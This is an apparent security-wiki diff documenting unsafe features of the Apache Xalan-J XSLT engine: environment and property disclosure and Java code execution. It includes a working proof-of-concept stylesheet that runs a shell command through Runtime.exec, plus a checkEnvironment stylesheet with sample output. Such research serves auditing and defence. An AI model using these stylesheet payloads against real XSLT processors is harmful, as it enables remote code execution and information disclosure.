Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35

From version 1.1 Icon
edited by Nicolas Gregoire
on 2012/01/04 18:56
Change comment: There is no comment for this version
To version Icon 35.1 Icon
edited by Nicolas Gregoire
on 2012/01/11 23:21
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Tags
... ... @@ -1,0 +1,1 @@
1 +xslt|engine|apache|java|unsafe
Content
... ... @@ -1,21 +1,67 @@
1 1  [[Xalan-J>>http://xml.apache.org/xalan-j/||rel="__blank" title="Xalan-J Home Page"]] is a Java based XSLT engine by the Apache Project.
2 2  
3 3  
4 -Supported XSLT version : 1.0
4 +== Supported version ==
5 5  
6 +1.0
6 6  
7 -Identification strings
8 +== Command line ==
8 8  
9 -| xsl:vendor-url|http:~/~/xml.apache.org/xalan-j
10 -| xsl:vendor|Apache Software Foundation
11 -| xsl:version|1.0
10 +$> java org.apache.xalan.xslt.Process -in foo.xml -xsl foo.xsl
12 12  
12 +__Note__ : xml-apis.jar, xercesImpl.jar and xalan*.jar must be in the $CLASSPATH
13 13  
14 +== Identification strings ==
14 14  
15 -Special features
16 +|=xsl:vendor-url|http:~/~/xml.apache.org/xalan-j
17 +|=xsl:vendor|Apache Software Foundation
18 +|=xsl:version|1.0
16 16  
20 +== Special features ==
21 +
17 17  * File creation
18 18  * Code execution
19 19  * JDBC connectivity
20 -* Java properties
21 -* CheckEnv()
25 +* Java properties disclosure
26 +* Java environment disclosure
27 +
28 +== Java properties disclosure ==
29 +
30 +The xsl:system-property() standard function can be called with non standard arguments, mapped to Java properties.
31 +
32 +|=Namespace|=Extension function|=PoC|=Sample output
33 +|http:~/~/xml.apache.org/xalan|checkEnvironment()|[[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]]|[[xalanj-checkenv-output.txt>>attach:xalanj-checkenv-output.txt]]
34 +
35 +== Java environment disclosure ==
36 +
37 +The checkEnvironment() extension function (documented [[here>>http://xml.apache.org/xalan-j/faq.html#faq-N10064||rel="__blank"]]) will display some information about the execution context (packages, paths, versions, ...).
38 +
39 +|=Namespace|=Extension function|=PoC|=Sample output
40 +|http:~/~/xml.apache.org/xalan|checkEnvironment()|[[xalanj-checkenv.xsl>>attach:xalanj-checkenv.xsl]]|[[xalanj-checkenv-output.txt>>attach:xalanj-checkenv-output.txt]]
41 +
42 +== Java code execution ==
43 +
44 +The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.
45 +
46 +
47 +|=Namespace|=Extension function|=PoC|=Sample output
48 +|http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date:
49 +Wed Jan 11 22:45:07 CET 2012
50 +
51 +== Execution of external commands ==
52 +
53 +The following code will execute the command "touch /tmp/hello" :
54 +
55 +<?xml version="1.0"?>
56 +<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform"
57 + xmlns:j="http:~/~/xml.apache.org/xalan/java"
58 + exclude-result-prefixes="j"
59 + version="1.0">
60 + <xsl:template match="/">
61 + <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable>
62 + <xsl:variable name="a" select="j:split($c, ' = ')"/>
63 + <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/>
64 + <xsl:variable name="p" select="j:exec($r, $a )"/>
65 + No content at the moment ...
66 + </xsl:template>
67 +</xsl:stylesheet>
Icon xalanj-checkenv-output.txt
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +2.5 KB
Content
... ... @@ -1,0 +1,31 @@
1 +<?xml version="1.0" encoding="UTF-8"?><checkEnvironmentExtension>
2 + <EnvironmentCheck version="$Revision$">
3 + <environment>
4 + <item key="version.DOM.draftlevel">2.0fd</item>
5 + <item key="java.class.path">/usr/share/java/xalan2.jar:/usr/share/java/xml-apis.jar:/usr/share/java/xercesImpl.jar:/usr/share/java/serializer.jar:/usr/share/java/xsltc.jar</item>
6 + <item key="version.JAXP">1.1 or higher</item>
7 + <item key="java.ext.dirs">/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/ext:/usr/java/packages/lib/ext</item>
8 + <item key="version.xerces2">Xerces-J 2.9.1</item>
9 + <item key="version.xerces1">not-present</item>
10 + <item key="version.xalan2_2">Xalan Java 2.7.1</item>
11 + <item key="version.xalan1">not-present</item>
12 + <item key="version.ant">not-present</item>
13 + <item key="java.version">1.6.0_26</item>
14 + <item key="version.DOM">2.0</item>
15 + <item key="version.crimson">not-present</item>
16 + <item key="sun.boot.class.path">/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/resources.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/rt.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jsse.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/jce.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/charsets.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/lib/modules/jdk.boot.jar:/usr/lib/jvm/java-6-sun-1.6.0.26/jre/classes</item>
17 + <foundJar desc="apis.jar-apparent.version" name="xml">xml-apis.jar present-unknown-version</foundJar>
18 + <foundJar desc="apis.jar-path" name="xml">/usr/share/java/xml-apis.jar</foundJar>
19 + <foundJar desc="apparent.version" name="xercesImpl.jar">xercesImpl.jar WARNING.present-unknown-version</foundJar>
20 + <foundJar desc="path" name="xercesImpl.jar">/usr/share/java/xercesImpl.jar</foundJar>
21 + <foundJar desc="apparent.version" name="serializer.jar">serializer.jar present-unknown-version</foundJar>
22 + <foundJar desc="path" name="serializer.jar">/usr/share/java/serializer.jar</foundJar>
23 + <foundJar desc="apparent.version" name="xsltc.jar">xsltc.jar present-unknown-version</foundJar>
24 + <foundJar desc="path" name="xsltc.jar">/usr/share/java/xsltc.jar</foundJar>
25 + <item key="version.SAX">2.0</item>
26 + <item key="version.xalan2x">Xalan Java 2.7.1</item>
27 + </environment>
28 + <status result="OK"/>
29 + </EnvironmentCheck>
30 +</checkEnvironmentExtension>
31 +
Icon xalanj-checkenv.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +310 bytes
Content
... ... @@ -1,0 +1,11 @@
1 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
2 + xmlns:xalan="http://xml.apache.org/xalan"
3 + version="1.0">
4 +
5 + <xsl:output method="xml" indent="yes" xalan:indent-amount="4"/>
6 + <xsl:template match="/">
7 + <xsl:copy-of select="xalan:checkEnvironment()"/>
8 + </xsl:template>
9 +
10 +</xsl:stylesheet>
11 +